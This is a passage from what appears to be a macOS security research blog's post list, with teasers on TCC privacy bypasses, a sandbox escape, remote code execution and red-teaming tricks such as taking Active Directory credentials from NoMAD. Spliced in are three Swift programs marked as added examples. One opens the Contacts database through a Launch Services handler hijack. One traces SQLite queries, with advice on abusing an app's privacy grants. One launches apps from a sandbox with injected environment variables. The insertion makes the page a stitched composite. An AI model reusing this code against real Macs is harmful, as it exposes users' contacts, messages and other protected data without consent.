Posts List

TCC bypasses via launch services

Overview of my favorite TCC bypass ever. This vulnerability was disclosed at Black Hat Europe 2022 in the talk Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms. The technique used an old Launch Services function, LSSetDefaultRoleHandlerForContentType, which allowed any application to be registered, without any restrictions, as the handler for a given UTI. After registering the app as the UTI handler, the exploit simply opens juicy files (such as the AddressBook or iMessages database) and TCC happily grants access to them.
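As an added example (not code from the original post), the following Swift program shows the two steps the overview describes: registering a bundle identifier as the default handler for a content type through LSSetDefaultRoleHandlerForContentType, and then asking Launch Services to open a TCC-protected file so it is delivered to that handler. The bundle identifier com.example.tccdemo is a placeholder for your own bundled app (Launch Services only delivers documents to an installed .app), the AddressBook path is the Contacts database location, and the registration is only accepted on a build that still behaves as the post describes.

```swift
// Added example, not code from the original post.
// Placeholders / assumptions: the bundle identifier below is your own bundled .app,
// and the target is the Contacts database (one of the "juicy files" the post names).
import Foundation
import CoreServices
import AppKit

/// Resolve the UTI Launch Services associates with a filename extension.
/// If no installed app declares the type, a dynamic "dyn.*" UTI is returned.
func uti(forExtension ext: String) -> String? {
    guard let id = UTTypeCreatePreferredIdentifierForTag(kUTTagClassFilenameExtension,
                                                          ext as CFString,
                                                          nil)?.takeRetainedValue()
    else { return nil }
    return id as String
}

/// Register `bundleID` as the default handler, for all roles, of `contentType`.
/// Returns the OSStatus; noErr (0) means Launch Services accepted the change.
func registerHandler(bundleID: String, contentType: String) -> OSStatus {
    return LSSetDefaultRoleHandlerForContentType(contentType as CFString,
                                                 .all,
                                                 bundleID as CFString)
}

/// Hand `path` to Launch Services, which opens it with the default handler
/// registered above.
func openWithDefaultHandler(path: String) -> Bool {
    return NSWorkspace.shared.open(URL(fileURLWithPath: path))
}

let handlerBundleID = "com.example.tccdemo"   // placeholder: your app's bundle ID
let targetExtension = "abcddb"                // Contacts' AddressBook database
let targetPath = NSHomeDirectory()
    + "/Library/Application Support/AddressBook/AddressBook-v22.abcddb"

guard let contentType = uti(forExtension: targetExtension) else {
    print("no UTI for .\(targetExtension)")
    exit(1)
}
let status = registerHandler(bundleID: handlerBundleID, contentType: contentType)
print("LSSetDefaultRoleHandlerForContentType(\(contentType)) -> \(status)")
if status == noErr {
    print("open(\(targetPath)) -> \(openWithDefaultHandler(path: targetPath))")
}
```

The file only reaches your code if the process that receives it is the bundled app named by handlerBundleID, so build this into that app rather than running it as a loose script; a non-zero OSStatus from the registration call is the quickest way to tell that Launch Services no longer accepts unrestricted handler changes.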

Multiple TCC bypasses via SQLite environment variables

Overview. These vulnerabilities were disclosed at Black Hat Europe 2022 in the talk Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms. The technique relied on an SQLite environment variable honored by libsqlite3.dylib which makes apps using the standard SQLite system API log all of their SQL queries. Since such queries may contain sensitive user data that is normally protected by TCC, I started researching all the problematic occurrences.
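The following Swift harness is an added example, not code from the post: it launches a target binary with the query-logging variable in its environment and collects the SQL the process emits. Two assumptions are labelled in the code, since the overview above does not name them: that the variable is SQLITE_AUTO_TRACE=1, and that the trace lines go to the child's stdout or stderr. One caveat matters if you want more than an inventory of what an app queries: a process spawned this way is attributed to its parent (here, your terminal) for TCC decisions, so it only reaches data the parent may already read; abusing a target app's own grants requires getting the variable into a process that Launch Services starts as its own responsible process.

```swift
// Added example, not code from the original post.
// Assumptions (labelled): the logging variable is SQLITE_AUTO_TRACE=1 and the trace
// is written to the child's stdout/stderr. The default target is a placeholder.
import Foundation

/// Run `executable` with the tracing variable set, capture its output for up to
/// `timeout` seconds, and return the lines that contain SQL statements.
func collectSQLTrace(executable: String,
                     arguments: [String] = [],
                     traceVariable: String = "SQLITE_AUTO_TRACE",   // assumption
                     timeout: TimeInterval = 10) throws -> [String] {
    let proc = Process()
    proc.executableURL = URL(fileURLWithPath: executable)
    proc.arguments = arguments

    var env = ProcessInfo.processInfo.environment
    env[traceVariable] = "1"
    proc.environment = env

    let pipe = Pipe()
    proc.standardOutput = pipe   // merge both streams: which one the trace lands on
    proc.standardError = pipe    // is an assumption, so capture either
    try proc.run()

    // Give the target time to start and touch its databases, then stop it.
    DispatchQueue.global().asyncAfter(deadline: .now() + timeout) {
        if proc.isRunning { proc.terminate() }
    }
    let data = pipe.fileHandleForReading.readDataToEndOfFile()
    proc.waitUntilExit()

    let verbs = ["SELECT ", "INSERT ", "UPDATE ", "DELETE ", "PRAGMA "]
    return String(decoding: data, as: UTF8.self)
        .split(separator: "\n")
        .map(String.init)
        .filter { line in
            let up = line.uppercased()
            return verbs.contains { up.contains($0) }
        }
}

// Usage: swift trace.swift /path/to/binary [args...]
let target = CommandLine.arguments.count > 1
    ? CommandLine.arguments[1]
    : "/System/Applications/Notes.app/Contents/MacOS/Notes"   // placeholder target
do {
    let statements = try collectSQLTrace(executable: target,
                                         arguments: Array(CommandLine.arguments.dropFirst(2)))
    print("\(statements.count) SQL statements seen from \(target)")
    statements.forEach { print($0) }
} catch {
    print("failed to launch \(target): \(error)")
}
```

Run it against a binary that links the system libsqlite3 and watch which tables it touches; an empty result after the timeout usually means the target was sanitizing its environment, was not using the system SQLite, or never opened a database before being terminated.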

ELECTRONizing macOS privacy

Publications. This research has been presented at: DEF CON 31 - ELECTRONizing macOS privacy; Objective By the Sea - ELECTRONizing macOS Privacy - a New Weapon in Your Red Teaming Armory. The backstory. In 2019 I wrote a blog post about injecting code into Electron apps to impersonate their TCC permissions. The trick was really simple because, at that time, the only thing an attacker had to do was modify one of the Electron app's HTML files or the whole ASAR.

macOS Atlassian Companion Remote Code Execution

Overview. I identified a vulnerability that allowed executing code on victims' machines after they click the Edit button on a Confluence page when Atlassian Companion is installed on macOS. The Atlassian Companion app enables users to edit Confluence files in their preferred desktop application, then save the file back to Confluence automatically. Source: https://confluence.atlassian.com/doc/administering-the-atlassian-companion-app-958456281.html Exploitation conditions: the victim must have Atlassian Companion installed, and the victim clicks the Edit button in Confluence, so the malicious file is opened in the Atlassian Companion app on macOS (standard app behavior).

Bypass TCC via iCloud

Overview. These vulnerabilities were first disclosed at TyphoonCon in Seoul during my talk What happens on your Mac, stays on Apple's iCloud?! Bypassing Mac privacy mechanisms. I found 2 code injection opportunities in iMovie and GarageBand which allowed me to impersonate their com.apple.private.icloud-account.access entitlements. Then I was able to talk to the iCloud XPC helper, which gave me the user's iCloud tokens. With these tokens I was able to get all the data that is synchronized with iCloud and is normally protected via TCC (Contacts, Reminders, Calendars, Location, etc.).

macOS Sandbox Escape vulnerability via Terminal

Introduction. In 2020 I observed a strange behavior: a sandboxed macOS app may launch any application, and the launched application won't inherit the main app's sandbox profile. It was even funnier as the sandboxed app can spawn those new apps with environment variables. I of course reported it to Apple, but I was told that it's expected behavior. Since then, there have been at least 2 publicly disclosed vulnerabilities that exploited the above-mentioned behavior:
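An added Swift example (not from the original post) of the behavior described: a process checks whether it is itself sandboxed and then launches another app bundle through Launch Services with extra environment variables. TextEdit as the launched app and DEMO_FROM_SANDBOX as the variable are placeholders; the launched app runs under its own entitlements rather than the caller's sandbox profile, which is exactly what makes the behavior interesting.

```swift
// Added example, not code from the original post.
// Placeholders: TextEdit as the launched app and DEMO_FROM_SANDBOX as the variable.
import AppKit

/// True when this process runs inside an App Sandbox container; the sandbox
/// runtime exposes the container identifier in the environment.
func isSandboxed() -> Bool {
    return ProcessInfo.processInfo.environment["APP_SANDBOX_CONTAINER_ID"] != nil
}

/// Launch the bundle at `appURL` via Launch Services with extra environment
/// variables. The result is a new top-level process under its own entitlements:
/// it is not a child of the caller and does not inherit the caller's sandbox.
func launch(appAt appURL: URL,
            environment: [String: String],
            completion: @escaping (Result<pid_t, Error>) -> Void) {
    let config = NSWorkspace.OpenConfiguration()
    config.environment = environment
    config.createsNewApplicationInstance = true   // never reuse a running copy
    NSWorkspace.shared.openApplication(at: appURL, configuration: config) { app, error in
        if let error = error {
            completion(.failure(error))
        } else if let app = app {
            completion(.success(app.processIdentifier))
        } else {
            completion(.failure(NSError(domain: NSCocoaErrorDomain, code: 0)))
        }
    }
}

print("caller sandboxed: \(isSandboxed())")

let target = URL(fileURLWithPath: "/System/Applications/TextEdit.app")  // placeholder
let done = DispatchSemaphore(value: 0)
launch(appAt: target, environment: ["DEMO_FROM_SANDBOX": "1"]) { result in
    switch result {
    case .success(let pid): print("launched \(target.lastPathComponent) as pid \(pid)")
    case .failure(let err): print("launch failed: \(err)")
    }
    done.signal()
}
// Keep the run loop alive until the completion handler fires.
while done.wait(timeout: .now()) == .timedOut {
    RunLoop.main.run(until: Date().addingTimeInterval(0.1))
}
```

Run it from inside a sandboxed helper to see caller sandboxed: true while TextEdit starts with no trace of that sandbox; from a plain terminal it prints false and simply shows the environment-passing path. TextEdit ignores the placeholder variable, so the interesting targets are apps that change behavior based on environment variables they receive at launch.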

macOS Red Teaming: Apple Dev-ID signed Java environment

macOS Red Teaming Tricks series. The idea of the #macOSRedTeamingTricks series is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements. The trick. There are a lot of different code execution & persistence methods on macOS, including ones that involve delivering your own interpreter/environment such as Java. Recently, I found out that Apple's Transporter app contains a working Java environment. So if you need a Java binary signed directly with the Apple Dev-ID certificate, go and grab it!

macOS Red Teaming: Initial access via AppleScript URL

macOS Red Teaming Tricks series. The idea of the #macOSRedTeamingTricks series is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements. The trick. This post is about a funny trick that may help you achieve initial access on a macOS machine. It requires advanced phishing, but code execution with a built-in TCC bypass is extremely powerful. Let's get to the point. The Script Editor (/System/Applications/Utilities/Script Editor.

macOS Red Teaming: Bypass TCC with old apps

macOS Red Teaming Tricks series. The idea of the #macOSRedTeamingTricks series is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements. The trick. This post shows how to bypass the macOS privacy framework (TCC) using old app versions. During red teaming engagements you sometimes need access to the camera/microphone or to files stored on the user's Desktop. It turns out that on macOS you cannot do this without special permissions, which are handled by the TCC framework.

macOS Red Teaming: Get Active Directory credentials from NoMAD

macOS Red Teaming Tricks series. This is the first post of the new #macOSRedTeamingTricks series. The idea is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements. The trick. This post shows how to get AD data, including a user's login and password, from a macOS machine with NoMAD configured. NoMAD helps Mac users bound to AD domains, and from my experience it is widely used software, particularly in legacy Windows environments.